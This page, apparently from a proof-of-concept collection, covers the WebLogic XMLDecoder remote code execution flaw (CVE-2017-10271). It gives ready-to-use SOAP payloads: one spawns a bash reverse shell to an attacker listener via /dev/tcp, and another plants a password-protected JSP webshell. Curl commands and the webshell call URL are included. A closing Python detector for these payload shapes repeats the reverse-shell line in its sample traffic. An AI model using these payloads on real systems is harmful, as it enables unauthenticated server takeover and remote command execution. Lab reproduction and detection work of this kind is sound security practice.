Awesome-POC/中间件漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md
2024-11-06 14:10:36 +08:00

# Weblogic XMLDecoder Remote Code Execution Vulnerability CVE-2017-10271
## Vulnerability description
The WLS Security component of Weblogic exposes a web service (the `wls-wsat` application) that uses `java.beans.XMLDecoder` to parse the `WorkContext` SOAP header supplied by the client. XMLDecoder evaluates the XML as a sequence of object constructions and method calls, so an unauthenticated attacker can make the server instantiate `java.lang.ProcessBuilder` and run arbitrary commands. Oracle fixed the issue in the October 2017 Critical Patch Update by validating the XML before decoding; CVE-2019-2725 later bypassed that validation.
## Affected versions
```
Weblogic 10.3.6.0.0
Weblogic 12.1.3.0.0
Weblogic 12.2.1.0.0
Weblogic 12.2.1.2.0
```
## Environment setup
Build the Weblogic 10.3.6.0 environment with Vulhub:
```
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2017-10271
docker-compose up -d
```
Once the container is up, open `http://your-vps-ip:7001/console` to confirm the admin console is reachable.
![](images/Weblogic%20XMLDecoder%20反序列化远程代码执行漏洞%20CVE-2019-2725/image-20240422141240591.png)
## Reproduction
Visit `http://your-ip:7001/wls-wsat/CoordinatorPortType`; if the endpoint exists, the target may be vulnerable. The other endpoints of the same application accept the payload too:
```plain
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
```
![](images/Weblogic%20XMLDecoder%20远程代码执行漏洞%20CVE-2017-10271/image-20240422141841164.png)
Save the following XML as poc.xml (replace `<your-vps-ip>` and `<your-vps-port>` with the address of your listener):
```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i &gt;&amp; /dev/tcp/<your-vps-ip>/<your-vps-port> 0&gt;&amp;1</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```
Start a listener on your VPS (for example `nc -lvnp <your-vps-port>`), then POST poc.xml with curl to get the reverse shell:
```shell
curl -v -X POST -H "Content-Type: text/xml" --data @poc.xml "http://your-ip:7001/wls-wsat/CoordinatorPortType"
```
![](images/Weblogic%20XMLDecoder%20远程代码执行漏洞%20CVE-2017-10271/image-20240422142240394.png)
![](images/Weblogic%20XMLDecoder%20远程代码执行漏洞%20CVE-2017-10271/image-20240422142305482.png)
A webshell can be written instead of spawning a shell: the payload constructs a `java.io.PrintWriter` on a path inside the deployed `bea_wls_internal` application and prints the JSP into it. The `9j4dqk` directory below is the deployment hash of that application in this vulhub image; on another installation, look up the actual name under `servers/AdminServer/tmp/_WL_internal/bea_wls_internal/`.
```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
          <void method="println"><string>
<![CDATA[
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b, 0, a)); } out.print("</pre>"); } %>
]]>
          </string></void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```
Call the webshell (`pwd` is the password checked by the JSP, `i` the command to run):
```
http://your-ip:7001/bea_wls_internal/test.jsp?pwd=023&i=whoami
```
![](images/Weblogic%20XMLDecoder%20远程代码执行漏洞%20CVE-2017-10271/image-20240422142615570.png)
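For the defensive side of this page, an added detection example (not code from the original page or from any WebLogic product): it inspects captured HTTP requests for the shape of both payloads above, a `java` element inside the `WorkContext` SOAP header, which is what XMLDecoder will evaluate, plus the classes and methods the public exploits use (`ProcessBuilder.start()` for the reverse shell, `PrintWriter.println()` for the webshell). The sample requests are constructed here for the example; the listener address in them and the function names `inspect_request` and `triage` are assumptions. The path filter is a heuristic tied to the `wls-wsat` endpoints listed on this page and can be switched off with `any_path=True`.

```python
import re
import xml.etree.ElementTree as ET

WORK_NS = "http://bea.com/2004/06/soap/workarea/"
WSAT_PATH = re.compile(r"^/wls-wsat/\w+")
# Classes the public payloads instantiate: command execution and file writes.
SUSPICIOUS_CLASSES = {
    "java.lang.ProcessBuilder", "java.lang.Runtime",
    "java.io.PrintWriter", "java.io.FileOutputStream",
}
SUSPICIOUS_METHODS = {"start", "exec", "println", "write"}


def inspect_request(method, path, body, any_path=False):
    """Return a sorted list of reasons the request looks like CVE-2017-10271
    abuse; an empty list means nothing matched. any_path=True drops the
    wls-wsat path filter for deployments exposing other SOAP endpoints."""
    if method.upper() != "POST":
        return []
    if not any_path and not WSAT_PATH.match(path):
        return []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []  # not well-formed XML at all, so XMLDecoder never runs
    reasons = set()
    for work in root.iter(f"{{{WORK_NS}}}WorkContext"):
        for java in work.iter("java"):
            # A java element here is the XMLDecoder document itself; legitimate
            # WorkContext headers carry encoded context values, not code.
            reasons.add("XMLDecoder document inside WorkContext header")
            for el in java.iter():
                if el.get("class") in SUSPICIOUS_CLASSES:
                    reasons.add(f"instantiates {el.get('class')}")
                if el.tag == "void" and el.get("method") in SUSPICIOUS_METHODS:
                    reasons.add(f"calls {el.get('method')}()")
    return sorted(reasons)


# Constructed sample traffic (not real captures): the two payloads from this
# page with a made-up listener 10.0.0.5:4444, a benign SOAP call, and a GET.
RSHELL = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>/bin/bash</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>bash -i &gt;&amp; /dev/tcp/10.0.0.5/4444 0&gt;&amp;1</string></void>
</array><void method="start"/></void></java>
</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

WEBSHELL = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println"><string><![CDATA[<% out.print(request.getParameter("i")); %>]]></string></void>
<void method="close"/>
</object></java></java>
</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

BENIGN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body><status xmlns="urn:example">ok</status></soapenv:Body>
</soapenv:Envelope>"""

SAMPLE_REQUESTS = [
    ("POST", "/wls-wsat/CoordinatorPortType", RSHELL),
    ("POST", "/wls-wsat/RegistrationPortTypeRPC11", WEBSHELL),
    ("POST", "/wls-wsat/CoordinatorPortType", BENIGN),
    ("GET", "/wls-wsat/CoordinatorPortType", ""),
]


def triage(requests):
    """Return (method, path, reasons) for every request that was flagged."""
    flagged = []
    for method, path, body in requests:
        reasons = inspect_request(method, path, body)
        if reasons:
            flagged.append((method, path, reasons))
    return flagged


if __name__ == "__main__":
    for method, path, reasons in triage(SAMPLE_REQUESTS):
        print(f"{method} {path}: " + "; ".join(reasons))
```

The nested `<java><java ...>` of the webshell payload is handled because every `java` element under the header is walked, and the set de-duplicates the reasons. Matching on the `WorkContext` header rather than on the literal string `XMLDecoder` matters: the `class="java.beans.XMLDecoder"` attribute is cosmetic and an attacker can drop it.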